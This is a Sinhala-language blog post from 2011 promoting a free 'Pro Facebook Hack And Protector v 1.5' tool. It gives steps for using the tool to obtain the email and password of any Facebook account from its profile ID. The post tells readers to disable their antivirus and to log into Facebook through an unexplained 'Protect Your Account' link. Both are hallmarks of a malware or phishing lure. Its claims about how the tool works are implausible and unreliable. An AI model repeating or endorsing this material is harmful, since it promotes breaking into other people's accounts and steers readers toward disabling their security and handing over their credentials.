Wednesday, September 21, 2011

Facebook Hacking


       Pro Facebook Hack And Protector v 1.5

 

මම අද ඔයාලට සල්ලි දීල ගන්න තියන Facebook Hacking සොෆ්ට්වෙයාර් එකක් Serial Key එක්ක Free දෙනව.Hack කරන විදිය සහ අපගෙ Account , Hacking වලින් Protect කරන විදිය අද මම ඔයාලට කියල දෙනව.

Hacking සොෆ්ට්වෙයාර් එක Install කිරීමට පෙර එයට තවත් Software එකක සහය අවෂ්ය වෙනවා. (.net framework ) එක හරියට install කර ගත්තෙ නැත්නම් Hacking Software එක වැඩ කරන්නෙ නැහැ.පහත ලින්ක් මගින් ඔබ කැමති එක සන්ස්කරනයක් ඔබගේ පරිගනකයට ස්තාපිත කර ගන්න.

NET Framework 2.0 (download ) 

.NET Framework 3.0 Redistributable Package (download ) 

.NET Framework 3.5 Service Pack 1 (download ) 

NET Framework 4.0 (download ) 

මෙන්න හැකින් Software එක පහත අති ලින්ක් එකෙන් Download කර ගන්න. ඔබගේ Facebook Account එකෙන් Log Out වී මෙයDownload කරන්න. මෙය  Virus Guard මගින් Run කිරීමට ඉඩ ලබා නොදෙයි.Hacking Tools,Virus Guard මගින් Run කිරීමට ඉඩ ලබා නොදෙයි.එම නිසා මෙය බාවිතා කරන විට ඔබගේ Virus Guard එක Dissable කරන්න.


Pro Facebook Hack And Protector v 1.5 (download )

1=
Protect My Account Facebook From Hack :
Protect yourself from hackers by this program,
So can not do any one by this program you can penetrate your account facebook

2 = Hack Facebook :Is able to penetrate anyone who has an account in the facebook
Knowing the password + Email


දැන් අපි බලමු මේ සොෆ්ට්වෙයාර් එක බාවිතා කරන අකාරය.

Pro Facebook Hack v 1.5 open කල විට පහත රූපයේ මෙන් දකින්නට ලැබේ.එහි තිබෙන Click Here කොටු මත Click කරමින් Next කරන්න.


ඉන් පසු පහත පරිදි box එකක් ලැබෙවි.Reply Button එක ක්ලික් කර නැවත Click Here කොටු මත Click කරමින් Next කරන්න. ඉන් පසුව Enter Programe Button එක ක්ලික් කරන්න.


ඉන් පසු පහත පරිදි box එකක් ලැබෙවි.



මෙහි Enter Button එක ක්ලික් කල විට Serial එක ඉල්ලයි.  textnew fb password.txt එකෙහි ඇති Serial Key වලින් එකක් ලබා දෙන්න.මෙම Serial No හැම වෙලවේදීම වෙනස් වෙන අතර textnew fb password.txt අති No වලින් හරියන එකක් ලබා දෙන්න.


ඔබ නිවැරදි ලෙස Serial No එක ඇතුල් කල විට පහත පරිදි Box එකක් ලැබේ.

මුලින්ම අපගේ Facebook Accout එක Protect කර ගත යුතුයි.Protect කරන ලද Acount , Hack කල නොහැක .එම නිසා ඔබගේ Facebook Account එක මෙමගින් Protect කර ගන්න.ඒ සදහා පහත ඇති ලින්ක් එක මගින් ඔබගේ Facebook Account එකට Log වෙන්න.

 

Protect Your Account Go to This Link

 

ඉන් පසු Protect Facebook Button එක ක්ලික් කරන්න.ඉන් පසු පහත පරිදි box එකක් ලැබෙවි.

 මෙයට ඔබගේ Facebook ගිනුමෙහි ID එක ලබා දෙන්න.ඉන් පසු Protect Button එක ක්ලික් කරන්න.

Open account profile page,. Look at address line in your browser. Usually it looks like:
http://www.facebook.com/profile.php?id=XXXXXXX
XXXXXXX - is Facebook account ID.  

ඉන් පසු Hack Facebook Button එක මගින් පිවිසෙන්න.ඉන් පසු පහත පරිදි box එකක් ලැබෙවි.

 මුලින්ම අප මෙහි Settings සෑදිය යුතුයි.ඒ සදහා Setting Button එක ක්ලික් කරන්න.ඉන් පසු පහත පරිදි box එකක් ලැබෙවි.

 මෙයට Facebook එකෙහි IP Address එක ලබා දීම සදහා Matrix Find ip address facebook v 1.0 ඇප්ලිකේෂන් එක Open කරගන්න . එය පහත පරිදි Open වීමෙන් පසු Find Ip ලබා දී ලබා ගත් IP එක Setting වලට ලබා දෙන්න.ඉන් පසු Connect Button එක ක්ලික් කරන්න.

ඉන් පසු නැවත පහත ඇති මෙනුවට Back වෙන්න.ඉන් පසු User ID එකට ඔබට හැක් කිරීමට අවෂ්ය Profile එකෙහි ID එක ලබා දෙන්න.ඉන් පසු Hack Button එක ක්ලික් කරන්න.පහත පරිදි ඔබට එම Profile එකෙහි Email එක සහ  Password එක Hack කිරීමෙන් ලබා ගත හැක.

මෙම Software එක ක්‍රියා නොකරන්නේ නම්,

ඔබ 

.net framework නිසි ලෙස Install කර නැත්නම්
Setinng හරියට සකසා නැත්නම්
සහ Protect කරන ලද Acount , Hack කල නොහැක .එම නිසා ඔබගේ Facebook Account එක මෙමගින් Protect කර ගන්න.

Protect Your Account Go to This Link

No comments:

Post a Comment